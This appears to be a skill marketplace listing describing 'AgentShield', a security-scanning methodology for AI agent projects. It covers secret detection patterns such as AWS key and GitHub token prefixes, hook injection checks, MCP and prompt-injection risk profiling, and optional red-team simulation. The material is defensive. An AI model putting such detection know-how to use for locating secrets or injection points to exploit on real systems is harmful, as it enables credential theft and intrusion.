Get the FREE Ultimate OpenClaw Setup Guide →

security-scanning

npx machina-cli add skill a5c-ai/babysitter/security-scanning --openclaw
Files (1)
SKILL.md
2.0 KB

Security Scanning

Overview

AgentShield security audit methodology adapted from the Everything Claude Code project. Scans across 5 categories with 102 static analysis rules.

Scanning Categories

1. Secrets Detection (14 Pattern Categories)

  • AWS access keys (AKIA pattern)
  • GitHub tokens (ghp_, gho_, ghs_, ghr_)
  • Generic API keys and bearer tokens
  • Database connection strings with credentials
  • Private keys (RSA, EC, SSH)
  • JWT secrets and signing keys
  • OAuth client secrets
  • Slack tokens and webhooks
  • Cloud provider credentials (GCP, Azure)

2. Permission Auditing

  • File system read/write scope
  • Network calls and protocols
  • Process execution (child_process)
  • File permissions (777, world-writable)
  • CORS and CSP headers
  • Docker privilege escalation

3. Hook Injection Analysis

  • Git hooks for command injection
  • npm lifecycle scripts (preinstall, postinstall)
  • Claude Code hooks for unsafe patterns
  • eval()/Function()/dynamic code execution
  • Unvalidated user input in shell commands

4. MCP Risk Profiling

  • Tool permission inventory
  • Data exposure risk mapping
  • Transport security (stdio vs SSE vs HTTP)
  • Prompt injection via tool descriptions
  • Rate limiting verification

5. Agent Config Review

  • Model settings integrity
  • Prompt injection resistance
  • Tool allowlist scoping
  • Output validation and sanitization
  • Information leakage in error messages

Optional: Red Team Simulation

  • Attack simulation against found vulnerabilities
  • Exploitability rating: trivial, moderate, difficult, theoretical
  • Blue-team defense recommendations

When to Use

  • Pre-deployment security review
  • New dependency introduction
  • Hook or plugin configuration changes
  • Agent or MCP server setup

Agents Used

  • security-reviewer (primary consumer)

Source

git clone https://github.com/a5c-ai/babysitter/blob/main/plugins/babysitter/skills/babysit/process/methodologies/everything-claude-code/skills/security-scanning/SKILL.mdView on GitHub

Overview

AgentShield delivers a security audit inspired by the Everything Claude Code project. It scans code and configs across five categories with 102 static analysis rules to uncover secrets, misconfigurations, and risky patterns.

How This Skill Works

The process runs static analysis across five categories: Secrets Detection, Permission Auditing, Hook Injection Analysis, MCP Risk Profiling, and Agent Config Review. Optional red-team simulation can be invoked to rate exploitability and guide blue-team defenses.

When to Use It

  • Pre-deployment security review
  • New dependency introduction
  • Hook or plugin configuration changes
  • Agent or MCP server setup
  • Red-team simulation is requested to assess exploitability

Quick Start

  1. Step 1: Initiate the AgentShield security-scanning workflow to run across the five categories
  2. Step 2: Review findings from Secrets Detection, Permission Auditing, Hook Injection Analysis, MCP Risk Profiling, and Agent Config Review
  3. Step 3: If enabled, run the Optional Red Team Simulation and implement blue-team recommendations

Best Practices

  • Prioritize findings from Secrets Detection (e.g., AKIA patterns, tokens, and keys) for immediate remediation
  • Closely review file system and network permission issues identified in Permission Auditing
  • Inspect hook scripts and unsafe dynamic code patterns in Hook Injection Analysis
  • Map data exposure risks and transport security implications in MCP Risk Profiling
  • Verify Agent Config Review metrics by validating model settings, prompt injection resistance, and tool allowlists; keep the 102 rules up to date

Example Use Cases

  • Auditing a new microservice deployment for secret leakage and misconfigurations
  • Reviewing a plugin configuration change to prevent privilege escalation and insecure headers
  • Evaluating npm lifecycle scripts and Git hooks for unsafe patterns
  • Assessing agent setup for prompt injection resistance and tool allowlist compliance
  • Running an optional red-team simulation to quantify exploitability and inform defenses

Frequently Asked Questions

Add this skill to your agents
Sponsor this space

Reach thousands of developers